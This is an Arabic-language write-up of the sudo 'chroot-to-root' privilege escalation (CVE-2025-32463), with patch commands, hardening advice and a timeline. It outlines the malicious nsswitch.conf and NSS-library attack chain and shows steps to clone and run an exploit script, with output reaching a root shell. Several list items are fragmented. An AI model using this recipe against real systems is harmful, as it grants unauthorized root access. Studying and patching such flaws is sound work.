
CVE-2025-32463

تصعيد الامتيازات المحلي الحرج في مدير الامتيازات الأكثر استخدامًا في لينكس
يمكن لأي مستخدم محلي (حتى بدون أذونات sudoers) أن يصبح root في ثوانٍ باستخدام sudo -R
CVE-2025-32463 (المعروف أيضًا باسم "chroot-to-root") هو تصعيد امتيازات محلي خطير في sudo.
يسمح لأي مستخدم محلي غير مميز — حتى أولئك غير المدرجين في sudoers — بالوصول الكامل إلى root بمجرد استخدام الخيار -R / --chroot.
تم إدخال الثغرة في sudo 1.9.14 (يونيو 2023) وكانت موجودة حتى 1.9.17p1 (يونيو 2025). لم تكن خللًا تقليديًا بل أثر جانبي خطير لكيفية معالجة sudo لحل المسار داخل chroot يتحكم به المستخدم قبل فحوصات السياسة.
إرشاد sudo الرسمي: "يمكن للمهاجم استغلال خيار
-Rالخاص بـ sudo لتشغيل أوامر عشوائية كجذر، حتى لو لم يكونوا مدرجين في ملف sudoers."
الواقع:
نشأ الخلل من تغيير في منطق مطابقة الأوامر في sudo عام 2023:
-R /path، يقوم sudo باستدعاء pivot_root() قبل تقييم سياسة sudoers بالكامل./etc/nsswitch.conf من داخل chroot./etc/nsswitch.conf خبيث (مثل: passwd: /woot1337)libnss_/woot1337.so.2 تحتوي على منشئ (constructor) يعمل كجذر.النقطة الرئيسية: كان الخيار -R مسموحًا به حتى للمستخدمين الذين ليس لديهم أذونات sudo، مما يجعله ناقل هجوم مثالي.
فقط sudo 1.9.14 حتى 1.9.17 (قبل 1.9.17p1)
متأثرة على نطاق واسع:
غير متأثرة:
استغلال بسطر واحد (من Stratascale CRU):
# 1 – استنساخ المستودع
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – بناء وتشغيل صورة Docker (معلمة بـ "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – تشغيل الاستغلال في الحاوية (يشغل أمر الجذر مباشرة أو يسقطك في شل جذر)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ تحذير: CVE-2025-32463 إثبات المفهوم (PoC) للاستغلال ⚠
═══════════════════════════════════════════════════════════════
هذا السكريبت مخصص للاختبار المصرح به فقط على الأنظمة التي تمتلكها.
تشغيله على أنظمة غير مصرح بها غير قانوني.
قم بالتصحيح فورًا بعد الاختبار (sudo 1.9.17p1+).
[+] إنشاء مرحلة استغلال مؤقتة...
[+] تجميع مكتبة NSS الخبيثة...
[+] تشغيل sudo -R ... (توقع شل جذر)
(إذا نجح، ستهبط في موجه bash لجذر)
[!] تم تشغيل CVE-2025-32463 - الحصول على صلاحيات الجذر...
[+] أنت الآن root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ آمن إذا كان 1.9.17p1 أو أحدث (أو ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
أضف إلى /etc/sudoers (أو ملف في /etc/sudoers.d/):
Defaults !use_chroot
ابحث عن أي سطور CHROOT= أو runchroot= وأزلهم.
نصيحة احترافية 2026: افحص صور Docker القديمة، مشغلات CI، والأجهزة الافتراضية القديمة — لا يزال الكثير منها يشحن لقطات sudo ضعيفة.
--chroot) يمكن أن تصبح سطح هجوم إذا لم تكن معزولة.عززت هذه الحادثة الحاجة إلى مبدأ أقل الامتيازات حتى في أدوات النظام الأساسية.
الحالة اعتبارًا من مارس 2026: ✅ معالج بالكامل على جميع الأنظمة الحديثة • ميزة Chroot مهملة • النظام البيئي أكثر أمانًا
مصنوع بـ ❤️ لمسؤولي لينكس الذين قاموا بالتصحيح قبل أن يصل KEV
| التاريخ | الحدث |
|---|
| يونيو 2023 | إصدار sudo 1.9.14 (إدخال الخلل) |
| 1 أبريل 2025 | إبلاغ ريتش ميرش بشكل خاص |
| 8 أبريل 2025 | تخصيص CVE-2025-32463 |
| 9 يونيو 2025 | اقتراح التصحيح |
| 30 يونيو 2025 | الإفصاح العام + مدونة Stratascale + PoC كامل |
| يوليو 2025 | إصدار sudo 1.9.17p1؛ توزيعات رئيسية تدفع التحديثات |
| 29 سبتمبر 2025 | الإضافة إلى كتالوج CISA KEV |
| 2026 | إهمال ميزة Chroot بالكامل عبر النظام البيئي |